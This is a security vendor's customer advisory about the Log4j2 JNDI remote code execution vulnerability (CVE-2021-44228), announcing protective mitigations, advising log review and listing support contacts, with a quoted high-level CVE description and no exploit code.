Apache Log4j2 <=2.14.1 JNDI remote code exploit

UPDATE: as at 10:39pm EST / 2:39pm AEDT / 4:23pm NZT

Following our earlier communication on the zero-day security vulnerability (CVE-2021-44228), as at 4:23pm NZT we’re confirming that for RedShield Cloud customers our engineers have deployed new shields across all of the applications we service for you ahead of schedule. Our team developed these new shields overnight and have fully tested their effectiveness against exploitation and you can be confident your apps are shielded from this vulnerability.

What’s next?
We would like to reiterate that this new vulnerability is of high severity and being actively exploited. We strongly advise checking your logs prior to this new shield being deployed. 

Remediating this vulnerability can be complex and take time. To immediately protect your other applications not shielded by RedShield - please log a P1 support ticket by calling the appropriate number below: 

North America +1 (844) 977 3303

UK & Europe + 44 118 324 2423

Australia +61 2 8880 0766

New Zealand +64 4 887 1117

For non-urgent support email


RedShield team



Earlier today we were notified by CISA, ACSC and CERTNZ of a far-reaching zero-day security vulnerability (CVE-2021-44228) that could allow for remote code execution by nefarious actors on a server, and which could impact online applications written in Java, and has already affected Minecraft: Java Edition, Apple, Amazon, Steam, Twitter, and more.

What are RedShield doing to protect against this vulnerability?
Our team has worked to quickly develop a shield for this specific vulnerability. We have since tested the efficacy of the shield and can confirm its effectiveness against exploitation of this vulnerability. We are currently in the process of deploying this new shield across all of the applications we service with RedShield Cloud and we estimate this will be completed within 24 hours from now. We’ll confirm once it has been completed.

For on-premise RedShield customers, we'll contact you directly to schedule shield updates which cover this vulnerability.

What can you do in the meantime?
We strongly recommend you review your logs for the last day as soon as possible as a precaution. If you have other applications using Java that are not yet in blocking mode behind RedShield that you would like this shield applied to urgently, please log a P1 support ticket by calling the appropriate number below:

North America +1 (844) 977 3303
UK & Europe + 44 118 324 2423
Australia +61 2 8880 0766
New Zealand +64 4 887 1117

For non-urgent support email


Apache Log4j2 <=2.14.1 JNDI remote code exploit




RedShield is currently mitigating a number of attackers attempting to exploit this vulnerability. Further mitigation measures are currently being rolled out across the network in anticipation of changing exploitation attempts. 


Customers who are using Apache Log4j2 <=2.14.1 JNDI features in configuration, log messages, and parameters should note the following:


“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”


For further details please see the following CVE announcement:

Was this article helpful?
0 out of 0 found this helpful
Have more questions? Submit a request